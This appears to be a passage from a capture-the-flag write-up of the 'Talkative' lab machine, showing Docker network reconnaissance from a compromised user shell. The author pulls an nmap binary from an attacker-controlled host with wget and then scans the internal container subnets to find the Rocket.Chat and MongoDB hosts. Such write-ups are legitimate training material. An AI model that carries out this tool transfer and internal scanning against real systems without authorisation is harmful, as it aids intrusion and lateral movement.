Docker
During the process enumeration phase, I found out that there are a lot of Docker containers running in the background
saul@talkative:/dev/shm$ docker ps -a
got permission denied while trying to connect to the docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission deniedThe saul user is unable to enumerate Docker instances due to lack of privileges
saul@talkative:/dev/shm$ ll /opt
total 12
drwxr-xr-x 3 root root 4096 Aug 10 2021 ./
drwxr-xr-x 19 root root 4096 Mar 15 2022 ../
drwx--x--x 4 root root 4096 Aug 10 2021 containerd/
saul@talkative:/dev/shm$ ll /opt/containerd
ls: cannot open directory '/opt/containerd': Permission deniedThere is the containerd directory at the /opt directory but I cannot access it.
saul@talkative:/dev/shm$ ifconfig | grep -w inet
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
inet 10.10.11.155 netmask 255.255.254.0 broadcast 10.10.11.255
inet 127.0.0.1 netmask 255.0.0.0I suspect that there are 2 Docker subnets; 172.17.0.0/16 and 172.18.0.0/16
In this case, it would be necessary to manually scan the whole network to get an idea of all the potential instances It would take a very long time.
Out of 3 web services, 2 of them have been both exploited and identified.
Those were jamovi and Bolt CMS with IP addresses of 172.17.0.13 and172.18.0.2 respectively.
Only the Rocket.Chat instance has not been checked and it could be ANYWHERE within those 2 subnets.
saul@talkative:/dev/shm$ wget -q http://10.10.14.9/nmap ; chmod 755 /dev/shm/nmapSince Nmap is not available, I will transfer the binary
saul@talkative:/dev/shm$ ./nmap -sn 172.17.0.0/16
starting nmap 6.49beta1 ( http://nmap.org ) at 2023-06-08 18:51 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.1
Host is up (0.0019s latency).
Nmap scan report for 172.17.0.2
Host is up (0.00083s latency).
Nmap scan report for 172.17.0.3
Host is up (0.00075s latency).
Nmap scan report for 172.17.0.4
Host is up (0.00071s latency).
Nmap scan report for 172.17.0.5
Host is up (0.00058s latency).
Nmap scan report for 172.17.0.6
Host is up (0.00047s latency).
Nmap scan report for 172.17.0.7
Host is up (0.00041s latency).
Nmap scan report for 172.17.0.8
Host is up (0.00036s latency).
Nmap scan report for 172.17.0.9
Host is up (0.00030s latency).
Nmap scan report for 172.17.0.10
Host is up (0.00025s latency).
Nmap scan report for 172.17.0.11
Host is up (0.00024s latency).
Nmap scan report for 172.17.0.12
Host is up (0.00053s latency).
Nmap scan report for 172.17.0.13
Host is up (0.0011s latency).
Nmap scan report for 172.17.0.14
Host is up (0.0010s latency).
Nmap scan report for 172.17.0.15
Host is up (0.00080s latency).
Nmap scan report for 172.17.0.16
Host is up (0.00071s latency).
Nmap scan report for 172.17.0.17
Host is up (0.00064s latency).
Nmap scan report for 172.17.0.18
Host is up (0.00058s latency).
Nmap scan report for 172.17.0.19
Host is up (0.00068s latency).
[...REDACTED...]This was an extremely inefficient scanning as it took a very long time.
-
The Docker hosts in the range,
172.17.0.4-19, were already discovered earlier Their port80were all mapped to individual ports6000-6015 -
172.17.0.1is the target host itself, -
172.17.0.3:3000was mapped to127.0.0.1:3000. The Rocket.Chat instance is accessible through the port3000therefore, this is possibly the rocket.chat instance although it is a bit strange see it mapped to the loopback address instead of something like*.*.*.*:3000 -
172.17.0.2has never been checked. I will start here
172.17.0.2
saul@talkative:/dev/shm$ ./nmap -p- 172.17.0.2
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-06-08 19:43 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.2
Host is up (0.000069s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
27017/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.22 secondsThe scan result shows that the Docker host, 172.17.0.2 has the port 27017 is open.
Checking the port online reveals that it is mostly used for MongoDB server.
MongoDB was brought up earlier by PSPY
This Docker host might be just the backend DB alone.
172.17.0.3
saul@talkative:/dev/shm$ ./nmap -p- 172.17.0.3
starting nmap 6.49beta1 ( http://nmap.org ) at 2023-06-08 19:50 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.3
Host is up (0.000075s latency).
not shown: 65534 closed ports
PORT STATE SERVICE
3000/tcp open unknown
nmap done: 1 IP address (1 host up) scanned in 9.43 secondsThe scan result is rather identical to the initial recon result.
saul@talkative:/dev/shm$ curl -s http://172.17.0.3:3000 | grep -i rocket
<title>Talkative's Rocket Chat</title><meta name="application-name" content="Talkative's Rocket Chat"><meta name="apple-mobile-web-app-title" content="Talkative's Rocket Chat">The Docker host, 172.17.0.3, is CONFIRMED to be the Rocket.Chat instance
saul@talkative:/dev/shm$ ps -auxwww | grep -i 3000
root 1481 0.0 0.0 1223984 588 ? sl 11:24 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 3000 -container-ip 172.17.0.3 -container-port 3000
saul@talkative:/dev/shm$ netstat -antup4 | grep -i 3000
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN - the 127.0.0.1:3000 socket is bound to 0.0.0.0:*
This explains how I was able to access the Rocket.Chat instance from the public side.